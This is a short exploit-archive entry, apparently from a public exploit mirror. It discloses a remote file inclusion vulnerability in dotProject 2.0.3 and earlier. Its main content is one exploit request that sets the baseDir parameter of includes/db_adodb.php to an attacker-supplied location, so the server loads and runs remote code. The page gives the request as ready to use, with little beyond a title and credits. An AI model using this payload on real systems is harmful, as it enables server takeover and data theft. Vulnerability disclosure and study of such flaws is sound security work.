dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : dotProject <= 2.0.3 (baseDir) Remote File Inclusion Vulnerability
# Published : 2006-06-20
# Author : h4ntu
# Previous Title : BandSite CMS <= 1.1.1 (root_path) Remote File Include Vulnerabilities
# Next Title : SmartSiteCMS 1.0 (root) Remote File Inclusion Vulnerability

Credits : h4ntu
Title : dotProject <= 2.0.3 Remote File Inclusion
URL : http://www.dotproject.net/
Exploit : http://target.com/[dotProject_path]/includes/db_adodb.php?baseDir=[attacker] 

# www.Syue.com [2006-06-20]